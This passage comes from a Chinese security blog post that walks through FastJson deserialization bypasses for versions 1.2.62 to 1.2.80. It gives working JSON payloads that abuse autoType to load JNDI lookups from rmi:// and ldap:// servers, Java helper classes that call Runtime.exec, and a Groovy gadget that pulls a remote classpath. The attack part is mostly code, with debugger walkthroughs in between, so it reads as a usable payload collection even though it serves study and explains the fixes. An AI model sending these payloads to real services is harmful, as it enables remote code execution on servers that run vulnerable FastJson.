<h4 id="POC-6"><a href="#POC-6" class="headerlink" title="POC"></a>POC</h4><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">  <span class="attr">&quot;@type&quot;</span><span class="punctuation">:</span><span class="string">&quot;org.apache.xbean.propertyeditor.JndiConverter&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;AsText&quot;</span><span class="punctuation">:</span><span class="string">&quot;rmi://127.0.0.1:1099/exploit&quot;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>



<h2 id="FastJson-1-2-66"><a href="#FastJson-1-2-66" class="headerlink" title="FastJson 1.2.66"></a>FastJson 1.2.66</h2><p>前提：autoTypeSupport 为 true</p>
<h4 id="POC-7"><a href="#POC-7" class="headerlink" title="POC"></a>POC</h4><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">  <span class="attr">&quot;@type&quot;</span><span class="punctuation">:</span><span class="string">&quot;org.apache.shiro.jndi.JndiObjectFactory&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;resourceName&quot;</span><span class="punctuation">:</span><span class="string">&quot;ldap://192.168.80.1:1389/Calc&quot;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br><span class="line"></span><br><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">  <span class="attr">&quot;@type&quot;</span><span class="punctuation">:</span><span class="string">&quot;br.com.anteros.dbcp.AnterosDBCPConfig&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;metricRegistry&quot;</span><span class="punctuation">:</span><span class="string">&quot;ldap://192.168.80.1:1389/Calc&quot;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br><span class="line"></span><br><span class="line"><span class="punctuation">&#123;</span><span class="attr">&quot;@type&quot;</span><span class="punctuation">:</span><span class="string">&quot;org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup&quot;</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">&quot;jndiNames&quot;</span><span class="punctuation">:</span><span class="string">&quot;ldap://192.168.80.1:1389/Calc&quot;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br><span class="line"></span><br><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">  <span class="attr">&quot;@type&quot;</span><span class="punctuation">:</span><span class="string">&quot;com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig&quot;</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">&quot;properties&quot;</span><span class="punctuation">:</span></span><br><span class="line">  <span class="punctuation">&#123;</span></span><br><span class="line">   <span class="attr">&quot;@type&quot;</span><span class="punctuation">:</span><span class="string">&quot;java.util.Properties&quot;</span><span class="punctuation">,</span></span><br><span class="line">   <span class="attr">&quot;UserTransaction&quot;</span><span class="punctuation">:</span><span class="string">&quot;ldap://192.168.80.1:1389/Calc&quot;</span></span><br><span class="line">  <span class="punctuation">&#125;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h2 id="FastJson-1-2-68"><a href="#FastJson-1-2-68" class="headerlink" title="FastJson 1.2.68"></a>FastJson 1.2.68</h2><p>FastJson 1.2.68版本引入了安全模式 safeMode，如果开启了安全模式，直接抛出异常，一劳永逸：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250112165649606.png" alt="image-20250112165649606"></p>
<p>这个版本有两个RCE： <code>ThrowableDeserializer.deserialze()</code> 和 <code>JavaBeanDeserializer.deserialze()</code></p>
<p>但是 <code>ThrowableDeserializer.deserialze()</code> 很鸡肋，因为很少有开发往异常类中去写命令执行。</p>
<h4 id="POC1-Throwable"><a href="#POC1-Throwable" class="headerlink" title="POC1 (Throwable)"></a>POC1 (Throwable)</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.xxxx.fastjson_demo.Exploit;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">ExecException</span> <span class="keyword">extends</span> <span class="title class_">Exception</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">private</span> String command;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="title function_">ExecException</span><span class="params">()</span> &#123;</span><br><span class="line">        <span class="built_in">super</span>();</span><br><span class="line">        System.out.println(<span class="string">&quot;构造函数&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">getCommand</span><span class="params">()</span> &#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;getCommand&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> command;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">setCommand</span><span class="params">(String command)</span> &#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;setCommand&quot;</span>);</span><br><span class="line">        <span class="built_in">this</span>.command = command;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">getMessage</span><span class="params">()</span> &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            Runtime.getRuntime().exec(command);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (IOException e) &#123;</span><br><span class="line">            <span class="keyword">return</span> e.getMessage();</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">super</span>.getMessage();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">  <span class="attr">&quot;@type&quot;</span><span class="punctuation">:</span><span class="string">&quot;java.lang.Exception&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;@type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;com.xxxx.fastjson_demo.Exploit.ExecException&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;command&quot;</span><span class="punctuation">:</span> <span class="string">&quot;open -a Calculator&quot;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>

<p>调试</p>
<p>获取 Java.lang.Exception的反序列化器时，跟进 getDeserializer()方法：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250113090744803.png" alt="image-20250113090744803"></p>
<p>因为 Throwable是 Exception类的父类，故使用 ThrowableDeserializer来获取反序列化器，而不是使用 createJavaBeanDeserializer()：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250113091122829.png" alt="image-20250113091122829"></p>
<p>继续跟进 deserializer.deserialze()：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250113094529453.png" alt="image-20250113094529453"></p>
<p>可以看到此时 checkAutoType()中的 exClassName值为 Throwable.class，跟进 checkAutoType()：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250113094937881.png" alt="image-20250113094937881"></p>
<p>符合 expectClass.isAssignableFrom(clazz)的条件，return clazz，通过 checkAutoType检测，后续通过调用 getter，setter方法引发RCE。</p>
<h4 id="POC2-AutoCloseable"><a href="#POC2-AutoCloseable" class="headerlink" title="POC2 (AutoCloseable)"></a>POC2 (AutoCloseable)</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.xxxx.fastjson_demo.Exploit;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.Closeable;</span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">ExecCloseable</span> <span class="keyword">implements</span> <span class="title class_">Closeable</span> &#123;</span><br><span class="line">    <span class="keyword">private</span> String command;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="title function_">ExecCloseable</span><span class="params">()</span> &#123;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="title function_">ExecCloseable</span><span class="params">(String command)</span> &#123;</span><br><span class="line">        <span class="built_in">this</span>.command = command;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">getCommand</span><span class="params">()</span> &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            Runtime.getRuntime().exec(command);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (IOException e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> command;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">setCommand</span><span class="params">(String command)</span> &#123;</span><br><span class="line">        <span class="built_in">this</span>.command = command;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">close</span><span class="params">()</span> <span class="keyword">throws</span> IOException &#123;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">  <span class="attr">&quot;@type&quot;</span><span class="punctuation">:</span><span class="string">&quot;java.lang.AutoCloseable&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;@type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;com.xxxx.fastjson_demo.Exploit.ExecCloseable&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;domain&quot;</span><span class="punctuation">:</span> <span class="string">&quot;open -a Calculator&quot;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>

<p>过程同理，不过多赘述。</p>
<h2 id="FastJson-1-2-80"><a href="#FastJson-1-2-80" class="headerlink" title="FastJson 1.2.80"></a>FastJson 1.2.80</h2><p>回顾 FastJson 1.2.68版本的漏洞，利用 ThrowableDeserializer和 JavaBeanDeserializer在调用 checkAutoType时第二个参数 exceptClass期望类不为空实现RCE，但是哪个开发往异常类里写命令执行函数呢，所以这个版本漏洞的攻击面很小，所以官网并未对这个绕过进行修复，而是把几个可能被利用的类加入了黑名单，为 FastJson 1.2.80版本的RCE埋下伏笔。</p>
<p>参考 Y4er师傅的代码，构造一个 Json解释原理：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//MyClass类</span></span><br><span class="line"><span class="keyword">package</span> com.xxxx.fastjson_demo.run;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">MyClass</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> String command;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">setCommand</span><span class="params">(String command)</span> <span class="keyword">throws</span> IOException &#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;MyClass.setCommand被调用&quot;</span>);</span><br><span class="line">        <span class="type">Runtime</span> <span class="variable">runtime</span> <span class="operator">=</span> Runtime.getRuntime();</span><br><span class="line">        runtime.exec(command);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//MyException类</span></span><br><span class="line"><span class="keyword">package</span> com.xxxx.fastjson_demo.run;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">MyException</span> <span class="keyword">extends</span> <span class="title class_">Throwable</span> &#123;</span><br><span class="line">    <span class="keyword">private</span> MyClass clazz;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">setClazz</span><span class="params">(MyClass clazz)</span> &#123;</span><br><span class="line">        <span class="built_in">this</span>.clazz = clazz;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<p>Json_poc:</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;a&quot;</span><span class="punctuation">:</span><span class="punctuation">&#123;</span></span><br><span class="line">        <span class="attr">&quot;@type&quot;</span><span class="punctuation">:</span><span class="string">&quot;java.lang.Exception&quot;</span><span class="punctuation">,</span></span><br><span class="line">        <span class="attr">&quot;@type&quot;</span><span class="punctuation">:</span><span class="string">&quot;com.xxxx.fastjson_demo.run.MyException&quot;</span><span class="punctuation">,</span></span><br><span class="line">        <span class="attr">&quot;clazz&quot;</span><span class="punctuation">:</span><span class="punctuation">&#123;</span><span class="punctuation">&#125;</span></span><br><span class="line">    <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;b&quot;</span><span class="punctuation">:</span><span class="punctuation">&#123;</span></span><br><span class="line">        <span class="attr">&quot;@type&quot;</span><span class="punctuation">:</span><span class="string">&quot;com.xxxx.fastjson_demo.run.MyClass&quot;</span><span class="punctuation">,</span><span class="attr">&quot;command&quot;</span><span class="punctuation">:</span><span class="string">&quot;open -a Calculator&quot;</span></span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>



<p>打断点调试，同 FastJson_1.2.68，使用反序列化器 ThrowableDeserializer，跟进 ThrowableDeserializer.deserialze()：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250113183610961.png" alt="image-20250113183610961"></p>
<p>依旧同 FastJson_1.2.68，获取第二个 @type中的值 <code>com.xxxx.fastjson_demo.run.MyException</code>，并创建它的异常实例：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250113183902429.png" alt="image-20250113183902429"></p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250113183935511.png" alt="image-20250113183935511"></p>
<p>继续跟进，若还有剩余键值对未进行反序列化 (这里剩余 “clazz”:{})，会继续获取 exClass的反序列化器：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250113184713311.png" alt="image-20250113184713311"></p>
<p>继续跟进，如果 value不是 fieldInfo.fieldClass类型则会进入 TypeUtils.cast()中，这里 fieldInfo.fieldClass 是 <code>com.xxxx.fastjson_demo.run.MyException</code>，value &#x3D; {}显然类型不同，跟进 TypeUtils.cast()：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250113185032749.png" alt="image-20250113185032749"></p>
<p>继续跟进：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250113185330154.png" alt="image-20250113185330154"></p>
<p>经过一系列判断，因为 obj &#x3D; value &#x3D; {}，{}表示空的 JSON对象，{} instancef Map是正确的，继续跟进 castToJavaBean()：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250113185856587.png" alt="image-20250113185856587"></p>
<p>跟进 getDeserializer()方法：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedundefinedimage-20250113190314011.png"></p>
<p>继续跟进：</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250113190314011.png" alt="image-20250113190314011"></p>
<p>最后调用 putDeserializer()方法，将 com.xxxx.fastjson_demo.run.MyClass类加入到 deserializer名单中</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250113190844221.png" alt="image-20250113190844221"></p>
<p>这样就可以在反序列化 Json中的 “b”的内容时，通过 checkAutoType检测，实现RCE。</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250113191423118.png" alt="image-20250113191423118"></p>
<h4 id="POC-8"><a href="#POC-8" class="headerlink" title="POC"></a>POC</h4><p>(1) Groovy: (参考 <a target="_blank" rel="noopener" href="https://github.com/Lonely-night/fastjsonVul/tree/7f9d2d8ea1c27ae1f9c06076849ae76c25b6aff7">https://github.com/Lonely-night/fastjsonVul/tree/7f9d2d8ea1c27ae1f9c06076849ae76c25b6aff7</a>)</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;@type&quot;</span><span class="punctuation">:</span><span class="string">&quot;java.lang.Exception&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;@type&quot;</span><span class="punctuation">:</span><span class="string">&quot;org.codehaus.groovy.control.CompilationFailedException&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;unit&quot;</span><span class="punctuation">:</span><span class="punctuation">&#123;</span><span class="punctuation">&#125;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;@type&quot;</span><span class="punctuation">:</span><span class="string">&quot;org.codehaus.groovy.control.ProcessingUnit&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;@type&quot;</span><span class="punctuation">:</span><span class="string">&quot;org.codehaus.groovy.tools.javac.JavaStubCompilationUnit&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;config&quot;</span><span class="punctuation">:</span><span class="punctuation">&#123;</span></span><br><span class="line">     <span class="attr">&quot;@type&quot;</span><span class="punctuation">:</span><span class="string">&quot;org.codehaus.groovy.control.CompilerConfiguration&quot;</span><span class="punctuation">,</span></span><br><span class="line">     <span class="attr">&quot;classpathList&quot;</span><span class="punctuation">:</span><span class="string">&quot;http://127.0.0.1:8090/&quot;</span></span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>



<p>修复：直接干掉了异常类</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250113231920232.png" alt="image-20250113231920232"></p>
<h2 id="参考文章："><a href="#参考文章：" class="headerlink" title="参考文章："></a>参考文章：</h2><p>(1) <a target="_blank" rel="noopener" href="https://y4er.com/posts/fastjson-1.2.80/">https://y4er.com/posts/fastjson-1.2.80/</a></p>
<p>(2) <a target="_blank" rel="noopener" href="https://y4er.com/posts/fastjson-bypass-autotype-1268/">https://y4er.com/posts/fastjson-bypass-autotype-1268/</a></p>
<p>(3) <a target="_blank" rel="noopener" href="https://y4er.com/posts/fastjson-learn/">https://y4er.com/posts/fastjson-learn/</a></p>
<p>(4) <a target="_blank" rel="noopener" href="https://github.com/su18/hack-fastjson-1.2.80">https://github.com/su18/hack-fastjson-1.2.80</a></p>
<p>(5) <a target="_blank" rel="noopener" href="https://github.com/Lonely-night/fastjsonVul/tree/7f9d2d8ea1c27ae1f9c06076849ae76c25b6aff7">https://github.com/Lonely-night/fastjsonVul/tree/7f9d2d8ea1c27ae1f9c06076849ae76c25b6aff7</a></p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2025/01/11/FastJson%E6%BC%8F%E6%B4%9E%20POC%E7%9A%84%E6%9E%84%E9%80%A0%E9%80%BB%E8%BE%91/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>上一页</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
              2025-01-21 10:53:33
            </span>
            
          </div>
          <div class="post-foot-prev">
            
              <a href="/2025/01/18/%E6%B5%85%E8%B0%88Java%E4%B8%AD%E7%9A%84SQL%E6%B3%A8%E5%85%A5/" target="_self">
                <span>下一页</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">目录</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#fastjson-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%97%B6%E7%9A%84%E4%B8%80%E4%BA%9B%E8%A7%84%E5%88%99"><span class="toc-text">fastjson 反序列化时的一些规则</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#FastJson"><span class="toc-text">FastJson &lt;&#x3D; 1.2.24</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#jdbcRowSetImpl%E9%93%BE"><span class="toc-text">jdbcRowSetImpl链</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#POC"><span class="toc-text">POC</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E5%9C%BA%E6%99%AF%EF%BC%9A"><span class="toc-text">利用场景：</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#TemplatesImpl%E9%93%BE-%E6%9D%A1%E4%BB%B6%E8%8B%9B%E5%88%BB"><span class="toc-text">TemplatesImpl链(条件苛刻)</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#POC-%E5%8F%82%E8%80%83-Y4er%E5%B8%88%E5%82%85"><span class="toc-text">POC(参考 Y4er师傅)</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1-2-25"><span class="toc-text">1.2.25 &lt;&#x3D; FastJson &lt;&#x3D; 1.2.41</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#POC-1"><span class="toc-text">POC</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#FastJson-1-2-42"><span class="toc-text">FastJson 1.2.42</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#POC-2"><span class="toc-text">POC</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#FastJson-1-2-43"><span class="toc-text">FastJson 1.2.43</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#POC-3"><span class="toc-text">POC</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#FastJson-1-2-44"><span class="toc-text">FastJson 1.2.44</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#FastJson-1-2-45"><span class="toc-text">FastJson 1.2.45</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#POC-4"><span class="toc-text">POC</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#FastJson-1-2-47-%E9%87%8D%E8%A6%81"><span class="toc-text">FastJson 1.2.47 (重要)</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#POC-5"><span class="toc-text">POC</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#FastJson-1-2-48"><span class="toc-text">FastJson 1.2.48</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#FastJson-1-2-62"><span class="toc-text">FastJson 1.2.62</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#POC-6"><span class="toc-text">POC</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#FastJson-1-2-66"><span class="toc-text">FastJson 1.2.66</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#POC-7"><span class="toc-text">POC</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#FastJson-1-2-68"><span class="toc-text">FastJson 1.2.68</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#POC1-Throwable"><span class="toc-text">POC1 (Throwable)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#POC2-AutoCloseable"><span class="toc-text">POC2 (AutoCloseable)</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#FastJson-1-2-80"><span class="toc-text">FastJson 1.2.80</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#POC-8"><span class="toc-text">POC</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E6%96%87%E7%AB%A0%EF%BC%9A"><span class="toc-text">参考文章：</span></a></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        







      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          
              <a title="github" target="_blank" rel="noopener" href="https://github.com/KaGty1">
                <i class="iconfont icon-github"></i>
              </a>
              
        </li>
        
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © 2025 Oranges</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
  
    <div class="footer-views">
      
      
          本文总阅读量<span id="busuanzi_value_page_pv"></span>次
        
      
      
    </div>
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        


        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
